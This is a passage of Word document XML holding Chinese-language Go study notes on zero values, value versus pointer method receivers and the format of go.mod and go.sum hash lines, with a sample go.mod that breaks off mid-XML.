    </w:p>
    <w:p w14:paraId="713FA08F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF7F64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C6F977" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D37C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型零值不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而是各字段值为对应类型的零值。且不能将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行等值判断，语法校验不通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43319633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605BF253" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="_Toc159779832"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OOP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构体的成员方法中，接收者为值与指针的区别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
    </w:p>
    <w:p w14:paraId="426C4526" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://cloud.tencent.com/developer/article/1446312</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA5AB54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AA9E44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用方法时注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60866DFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）不管方法的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> receiver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是对象的值还是指针，对象的值和指针均可以调用该方法。即对象的值既可以调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> receiver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是值的方法，也可以调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> receiver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指针的方法。对象的指针也是如此；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20369A91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）当方法的接收者是值时，即使是指针调用，那么方法内部也是对原对象的副本进行操作，不会影响原对象；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D478BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）当方法的接收者是指针时，即使用值调用，那么方法内部也是通过指针对原对象进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>行操作，会影响原对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570A5AB" w14:textId="77777777" w:rsidR="0071252F" w:rsidRDefault="0071252F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085E714D" w14:textId="77777777" w:rsidR="0071252F" w:rsidRDefault="0071252F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23031CF0" w14:textId="3457A98C" w:rsidR="0071252F" w:rsidRDefault="0071252F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="_Toc159779833"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>omod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
    </w:p>
    <w:p w14:paraId="63E6A6C9" w14:textId="77777777" w:rsidR="0071252F" w:rsidRDefault="0071252F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEF38AF" w14:textId="71C271BB" w:rsidR="0071252F" w:rsidRDefault="00067B0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidRPr="005852A1">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://juejin.cn/post/6977260510483841038</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F8820A3" w14:textId="77777777" w:rsidR="00067B0F" w:rsidRDefault="00067B0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8FB693" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cloud.google.com/go/firestore v1.1.0/go.mod h1:ulACoGHTpvq5r8rxGJ4ddJZBZqakUQqClKRT5SZwBmk=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BF8F2" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的大致意思是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A4A0F" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;module&gt; &lt;version&gt;/go.mod h1:&lt;sha256hash+base64&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7FBBC" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一段是模块依赖路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7156C7" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二段是版本信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761AF751" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三段是针对该文件内容计算的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sha256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希值再进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038ED557" w14:textId="77777777" w:rsidR="000E18CA" w:rsidRDefault="000E18CA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表的意思就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sha256+base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C2F2DB" w14:textId="77777777" w:rsidR="00067B0F" w:rsidRDefault="00067B0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F7CFAE" w14:textId="77777777" w:rsidR="00056E00" w:rsidRDefault="00056E00" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034BD048" w14:textId="089E2DB5" w:rsidR="00056E00" w:rsidRDefault="00A30902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>o.mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F4B93" w14:textId="77777777" w:rsidR="00A30902" w:rsidRDefault="00A30902" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>testnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">require </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">golang.org/x/net </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>v0.11.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">require </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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/inconshreveable/mousetrap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">v1.1.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// indirect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/spf13/cobra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">v1.7.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// indirect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/spf13/pflag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">v1.0.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// indirect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C5140A" w14:textId="77777777" w:rsidR="00A30902" w:rsidRPr="00A30902" w:rsidRDefault="00A30902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C944593" w14:textId="7F6A8086" w:rsidR="00056E00" w:rsidRDefault="00A30902" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F84D16" w14:textId="77777777" w:rsidR="00C75A3E" w:rsidRDefault="00C75A3E" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
